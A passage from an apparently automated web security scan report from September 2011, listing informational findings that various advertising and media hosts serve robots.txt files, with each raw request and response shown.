Severity:   Information
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /gmatcher

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 01:31:26 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

23.49. http://g.ca.bid.invitemedia.com/pubm_imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://g.ca.bid.invitemedia.com
Path:   /pubm_imp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: g.ca.bid.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 01:29:16 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

23.50. http://g2.gumgum.com/services/get  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://g2.gumgum.com
Path:   /services/get

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: g2.gumgum.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=21600
Content-Type: text/plain
Date: Sat, 17 Sep 2011 00:53:27 GMT
Expires: Sat, 17 Sep 2011 06:53:27 GMT
Last-Modified: Wed, 14 Sep 2011 22:27:28 GMT
Server: nginx/0.6.35
Content-Length: 234
Connection: Close

User-Agent: *
Disallow: /images/
Disallow: /javascripts/
Disallow: /stylesheets/
Disallow: /404.html
Disallow: /500.html
Disallow: /ad/
Disallow: /assets/
Disallow: /photo/
Disallow: /provider/
Disall
...[SNIP]...

23.51. http://gallery.pictopia.com/bostonherald/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gallery.pictopia.com
Path:   /bostonherald/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gallery.pictopia.com

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:07:37 GMT
Server: Apache
Last-Modified: Thu, 07 Apr 2011 22:20:31 GMT
ETag: "208049b-4a-4a05b846c49c0"
Accept-Ranges: bytes
Content-Length: 74
Cache-Control: max-age=2592000
Expires: Mon, 17 Oct 2011 01:07:37 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Age: 1795
X-Cache: HIT from wc4-www.pictopia.com
Via: 1.1 wc4-www.pictopia.com:80 (squid/2.7.STABLE6)
Connection: close

User-agent: discobot
Disallow: /

User-agent: *
Disallow:
Crawl-delay: 5

23.52. http://gscounters.gigya.com/gs/api.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gscounters.gigya.com
Path:   /gs/api.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 07 Apr 2011 14:26:21 GMT
Accept-Ranges: bytes
ETag: "c8d91cc42ff5cb1:0"
Server: Microsoft-IIS/7.5
X-Server: web516
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
Date: Sat, 17 Sep 2011 01:02:03 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.53. http://imagec12.247realmedia.com/RealMedia/ads/Creatives/BostonHerald/Monster_RON_728x90/Monster_728x90_FINAL.swf/1297456388  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imagec12.247realmedia.com
Path:   /RealMedia/ads/Creatives/BostonHerald/Monster_RON_728x90/Monster_728x90_FINAL.swf/1297456388

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: imagec12.247realmedia.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Fri, 23 Apr 2010 14:16:59 GMT
ETag: "beaad-1a-484e8148e6cc0"
ntCoent-Length: 26
Content-Type: text/plain
Cache-Control: private, max-age=67546
Date: Sat, 17 Sep 2011 01:09:56 GMT
Content-Length: 26
Connection: close

User-agent: *
Disallow: /

23.54. http://imp.fetchback.com/serve/fb/adtag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:25 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...

23.55. http://ll.static.abc.com/m/vp2/sfp/prod/v1.0.0/js/abc/sfp2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ll.static.abc.com
Path:   /m/vp2/sfp/prod/v1.0.0/js/abc/sfp2.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ll.static.abc.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=150
Content-Type: text/plain
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc04
X-Powered-By: ASP.NET
Cache-Expires: Wed, 14 Sep 2011 08:37:21 GMT
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 17 Sep 2011 01:02:05 GMT
Last-Modified: Fri, 22 Apr 2011 20:01:15 GMT
Expires: Sat, 17 Sep 2011 01:04:35 GMT
Content-Length: 136
Connection: close

User-agent: *
Disallow: /
User-agent: msnbot-media
Allow: /vp2/
User-agent: Googlebot
Allow: /media/_global/player/*/flash/SFP_Locke.swf

23.56. http://load.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: load.exelator.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1826475347"
Last-Modified: Tue, 15 Apr 2008 16:21:01 GMT
Content-Length: 27
Date: Sat, 17 Sep 2011 01:47:58 GMT
Server: HTTP server

User-agent: *
Disallow: /

23.57. http://loadm.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /load/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: loadm.exelator.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-305709181"
Last-Modified: Tue, 15 Apr 2008 16:21:01 GMT
Content-Length: 27
Date: Sat, 17 Sep 2011 01:14:01 GMT
Server: HTTP server

User-agent: *
Disallow: /

23.58. http://log.go.com/log  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://log.go.com
Path:   /log

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: log.go.com

Response

HTTP/1.1 200 OK
Content-Length: 28
Content-Type: text/plain
Last-Modified: Fri, 07 Jan 2011 05:47:41 GMT
Accept-Ranges: bytes
ETag: "f8e423662eaecb1:56d"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N7AdLog01
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:02:37 GMT
Connection: close

User-agent: *
Disallow: /

23.59. http://map.media6degrees.com/orbserv/aopix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /orbserv/aopix

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"36-1274467434000"
Last-Modified: Fri, 21 May 2010 18:43:54 GMT
Content-Type: text/plain
Content-Length: 36
Date: Sat, 17 Sep 2011 00:53:30 GMT
Connection: close

# go away
User-agent: *
Disallow: /

23.60. http://metrics.tmz.com/b/ss/wbrostmz/1/H.20.3/s31416852392721  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.tmz.com
Path:   /b/ss/wbrostmz/1/H.20.3/s31416852392721

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.tmz.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:51:59 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "24fce-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www28
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

23.61. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: network.realmedia.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:11:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Tue, 31 Mar 2009 16:50:50 GMT
ETag: "1061e8-1a-4666d0056ce80"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Sat, 17-Sep-2011 01:12:17 GMT;path=/;httponly

User-agent: *
Disallow: /

23.62. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/national/remembering_911/home/L24/1480354666/Right/BostonHerald/Pictopia_160x600_House/Pictopia-160x600.jpg/4d686437616b35776e72734144666853  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/national/remembering_911/home/L24/1480354666/Right/BostonHerald/Pictopia_160x600_House/Pictopia-160x600.jpg/4d686437616b35776e72734144666853

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: oascentral.bostonherald.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:36:47 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Fri, 23 Apr 2010 15:55:03 GMT
ETag: "13dbd6-1a-484e9734523c0"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

23.63. http://odb.outbrain.com/utils/ping.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/ping.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: odb.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"30-1311068652000"
Last-Modified: Tue, 19 Jul 2011 09:44:12 GMT
Content-Type: text/plain
Content-Length: 30
Date: Sat, 17 Sep 2011 00:56:34 GMT
Connection: close

User-agent: *
Disallow: /


23.64. http://p4.choubllcbxhka.a3wlja2w5g6k7l2x.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p4.choubllcbxhka.a3wlja2w5g6k7l2x.if.v4.ipv6-exp.l.google.com
Path:   /intl/en/ipv6/exp/redir.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: p4.choubllcbxhka.a3wlja2w5g6k7l2x.if.v4.ipv6-exp.l.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Tue, 06 Sep 2011 05:52:07 GMT
Date: Sat, 17 Sep 2011 00:58:45 GMT
Expires: Sat, 17 Sep 2011 00:58:45 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

23.65. http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.755902.s1.v4.ipv6-exp.l.google.com/gen_204  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.755902.s1.v4.ipv6-exp.l.google.com
Path:   /gen_204

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: p4.dwoldbj6emar2.ydgi23e62tcrxhhn.755902.s1.v4.ipv6-exp.l.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Tue, 06 Sep 2011 05:52:07 GMT
Date: Sat, 17 Sep 2011 00:58:04 GMT
Expires: Sat, 17 Sep 2011 00:58:04 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

23.66. http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com
Path:   /intl/en/ipv6/exp/redir.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Tue, 06 Sep 2011 05:52:07 GMT
Date: Sat, 17 Sep 2011 00:57:11 GMT
Expires: Sat, 17 Sep 2011 00:57:11 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

23.67. http://pixel.33across.com/ps/517389/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/517389/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:28 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 21:37:22 GMT
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /


23.68. http://pixel.invitemedia.com/data_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 01:29:24 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

23.69. http://ps2.newsinc.com/Playlist/show/90017/1957/507.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ps2.newsinc.com
Path:   /Playlist/show/90017/1957/507.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ps2.newsinc.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sat, 17 Sep 2011 01:10:48 GMT
ETag: "67481927f221cc1:0"
Last-Modified: Fri, 03 Jun 2011 13:28:40 GMT
NDN-Server: PS01
NDN-SiteVer: 3.2.1
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 28
Connection: Close

User-agent: *
Disallow: /

23.70. http://puma.vizu.com/cdn/00/00/23/91/smart_tag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://puma.vizu.com
Path:   /cdn/00/00/23/91/smart_tag.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: puma.vizu.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:55:49 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n53 ( lax-agg-n48), ht lax-agg-n48.panthercdn.com
ETag: "9c6e3-1a-470448c0"
P3P: CP="DSP NID OTP UNR STP NON", policyref="/w3c/p3p.xml"
Cache-Control: max-age=604800
Expires: Tue, 20 Sep 2011 04:00:22 GMT
Age: 334527
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 11 Aug 2011 17:39:23 GMT
Connection: close

User-agent: *
Disallow: /

23.71. http://q1.checkm8.com/adam/detect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://q1.checkm8.com
Path:   /adam/detect

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: q1.checkm8.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:09:50 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.213.15 PA-AD5
ETag: "1316192627"
Last-Modified: Fri, 16-Sep-2011 17:03:47 GMT
Age: 0
Cache-Control: max-age=86400
Content-Length: 28
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

User-agent: *
Disallow: /

23.72. http://qa.n7.vp2.abc.go.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://qa.n7.vp2.abc.go.com
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: qa.n7.vp2.abc.go.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:03:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 18 May 2011 03:08:05 GMT
ETag: "188306-1a-327e6f40"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

23.73. http://r.casalemedia.com/j.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /j.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Sep 2010 18:44:55 GMT
ETag: "15683a6-1a-cb0517c0"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Expires: Sat, 17 Sep 2011 01:39:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 01:39:03 GMT
Connection: close

User-agent: *
Disallow: /

23.74. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sat, 17 Sep 2011 01:39:31 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

23.75. http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r1-ads.ace.advertising.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:35:33 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sat, 17 Sep 2011 01:35:32 GMT
Connection: close
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

User-agent: *
Disallow: /

23.76. http://r1.zedo.com/log/ERR.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1.zedo.com
Path:   /log/ERR.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r1.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Thu, 11 Sep 2008 04:30:19 GMT
ETag: "3e4e4ae-4c-4569739f12cc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Sat, 17 Sep 2011 01:11:36 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

23.77. http://rds.yahoo.com/b.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rds.yahoo.com
Path:   /b.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rds.yahoo.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:56:16 GMT
Set-Cookie: D=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Wed, 24 Sep 2008 23:57:46 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8
Cache-Control: private

User-agent: *
Disallow: /

23.78. http://rt.legolas-media.com/lgrt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rt.legolas-media.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:08:21 GMT
Server: Apache
Last-Modified: Fri, 08 Jul 2011 17:46:27 GMT
ETag: "38100-1b-4a79269af42c0"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /


23.79. http://rt1302.infolinks.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt1302.infolinks.com
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rt1302.infolinks.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"47-1315497277000"
Last-Modified: Thu, 08 Sep 2011 15:54:37 GMT
Content-Type: text/plain
Content-Length: 47
Date: Sat, 17 Sep 2011 00:59:22 GMT
Connection: close

# not to be crawled
User-agent: *
Disallow: /


23.80. http://rt1701.infolinks.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt1701.infolinks.com
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rt1701.infolinks.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"47-1315497277000"
Last-Modified: Thu, 08 Sep 2011 15:54:37 GMT
Content-Type: text/plain
Content-Length: 47
Date: Sat, 17 Sep 2011 00:51:47 GMT
Connection: close

# not to be crawled
User-agent: *
Disallow: /


23.81. http://rt1702.infolinks.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt1702.infolinks.com
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rt1702.infolinks.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"47-1315497277000"
Last-Modified: Thu, 08 Sep 2011 15:54:37 GMT
Content-Type: text/plain
Content-Length: 47
Date: Sat, 17 Sep 2011 01:08:21 GMT
Connection: close

# not to be crawled
User-agent: *
Disallow: /


23.82. http://rt1803.infolinks.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt1803.infolinks.com
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rt1803.infolinks.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"47-1315497277000"
Last-Modified: Thu, 08 Sep 2011 15:54:37 GMT
Content-Type: text/plain
Content-Length: 47
Date: Sat, 17 Sep 2011 00:51:03 GMT
Connection: close

# not to be crawled
User-agent: *
Disallow: /


23.83. http://rt1804.infolinks.com/static/blank.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt1804.infolinks.com
Path:   /static/blank.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rt1804.infolinks.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"47-1315497277000"
Last-Modified: Thu, 08 Sep 2011 15:54:37 GMT
Content-Type: text/plain
Content-Length: 47
Date: Sat, 17 Sep 2011 01:09:02 GMT
Connection: close

# not to be crawled
User-agent: *
Disallow: /


23.84. http://rt1903.infolinks.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt1903.infolinks.com
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rt1903.infolinks.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"47-1315497277000"
Last-Modified: Thu, 08 Sep 2011 15:54:37 GMT
Content-Type: text/plain
Content-Length: 47
Date: Sat, 17 Sep 2011 01:01:40 GMT
Connection: close

# not to be crawled
User-agent: *
Disallow: /


23.85. http://s0.2mdn.net/2906542/11dvm_quiltednorthern_banners_300x250.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /2906542/11dvm_quiltednorthern_banners_300x250.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 17 Sep 2011 00:50:41 GMT
Expires: Sun, 18 Sep 2011 00:50:41 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /

23.86. http://sana.newsinc.com/sana.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sana.newsinc.com
Path:   /sana.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sana.newsinc.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "6c0c0b02c59a0e5b43917105fbeae507:1309405350"
Last-Modified: Thu, 30 Jun 2011 03:42:30 GMT
Accept-Ranges: bytes
Content-Length: 28
Content-Type: text/plain
Date: Sat, 17 Sep 2011 01:09:40 GMT
Connection: close
X-N: S

User-agent: *
Disallow: /

23.87. http://search.yahoo.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.yahoo.com
Path:   /search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.yahoo.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:55:54 GMT
Set-Cookie: D=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/; domain=.yahoo.com
